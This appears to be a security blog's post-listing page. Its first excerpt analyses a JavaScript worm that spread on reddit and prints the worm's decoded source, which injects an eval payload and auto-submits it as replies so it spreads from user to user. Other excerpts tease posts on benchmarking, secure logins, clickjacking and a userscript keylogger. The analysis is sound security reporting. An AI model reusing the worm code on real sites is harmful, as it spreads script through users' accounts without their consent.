Today when reddit was down for maintenance people kept gathering on the #redditdowntime channel on freenode where under a couple of minutes intriguing things started to happen.
You can read the whole story here (and come back afterwards).
(continue)
As I am writing this a javascript worm is having fun spreading on reddit. For one part we should be happy it only spreads and does not do anything else (you now, like cookie theft). On the other hand, it may be an attempt to DDoS reddit, because I’m suddenly starting to get error pages…
An error occurred while processing your request.
Reference #97.27c37259.1254106488.35b1d0e
The (decoded) code of the worm is the following:
// generate payload/attack vector
// having trouble understanding why this works
z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";
// and what's with the 9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d ?
// "click" all reply links in page
o=document;
e=o.getElementsByTagName('a');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='reply')
$(e[i]).click();
// fill with payload
o=document;
e=o.getElementsByTagName('textarea');
for(i=0;i<e.length;i++)
e[i].value=z;
// submit
e=o.getElementsByTagName('button');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='save'&&e[i].style.display!='none')
$(e[i]).click();
In the meantime of writing the article I tried to look for the invalid filtering in the source code, but as touching for the first time the code had no sense of direction. If someone would be kind enough to enlighten me in which file the code resides I’d be more than happy.
If not, we’ll have an unsolved mystery :)
UPDATE: worm author has happily shared its way of evading the filter.
UPDATE 2: post about the bug on the reddit blog.
There are a series of ways by which you could benchmark Javascript code. Either by using the Firebug console API, example:
console.time("first");
// some javascript code
console.timeEnd("first");
Another way would be the one which ppk suggested on his blog.
function testIt() {
var startTime = new Date().getTime();
// actual DOM functionality to be tested goes here
setTimeout(function () {
var endTime = new Date().getTime();
var result = (endTime-startTime)/1000;
// print result
},10)
}
The reason why the result is printed through a different function set to run on timeout is:
(…) some browsers only applies the result of the test (i.e. the changes in the DOM you want to test) to the screen after the function has ended entirely. (…) The correct way of conducting this test is setting a timeout for reading out the end time. The function ends when the in-memory DOM manipulation has been done, which allows the browser to apply the changes.
If that’s the case, we could also use the following function for benchmarking Javascript code (a more flexible version):
function benchmark(func) {
var startTime = new Date().getTime();
func();
var endTime = new Date().getTime();
return (endTime-startTime)/1000;
}
// as for usage
time = benchmark(function() {
// javascript code to benchmark
});
It is completely unrelated to any aspect of security, but there are some topics that just make me blog about… Anyway, very soon I’ll post on, have a few projects I’m working on lately.
In my new project (involving spam) I’ve created a script for retrieving the messages locally, which you could also use for rapidly backing up your emails.
The script is aimed for retrieving the emails for multiple accounts using the POP3 protocol (via SSL).
(continue)
After reading the title you may say to yourself “Oh no, another <<secure login script>> article! Aren’t there enough already online?”. Yes there are, but unfortunately many tutorials (if it’s appropriate to call them so) only show you how to write SQL Injection free code. But that isn’t enough. What about brute force (dictionary, hybrid) attacks? Or how about making your admin panel (user panel) CSRF free? Well this article will try to deal with those issues too.
Logs are a very important part of security, either for preventing attacks or for forensics. But sometimes you don’t have access to logs, like for example in shared hosting environments.
Some days ago while I was writing the (traffic magnet) article HYGHAAZG and mentioned the keylogger, instantly it came to mind a userscript one. Googled a bit, but didn’t seem to find any (quite amazed)…
Yesterday while browsing some security tagged discussions on stackoverflow.com I’ve noticed someone mentioned some filter_ prefixed PHP functions. At first I thought they were some custom written ones, but on a quick check it turned out that there really where this functions. I was shocked. Anyway, let’s digg into it…
With all the buzz around Clickjacking I had to come up with an article which would contain that word, or at least a part of it. This article could be also named Form Thievery, but it wouldn’t sound that cool
, would it?
How many times did you check a web application of yours with a security auditing tool?
I can tell you that I did it a couple of times. And as usual it always hit me with the same warning: ‘the login information is sent in plain text to …php’, or something of sort.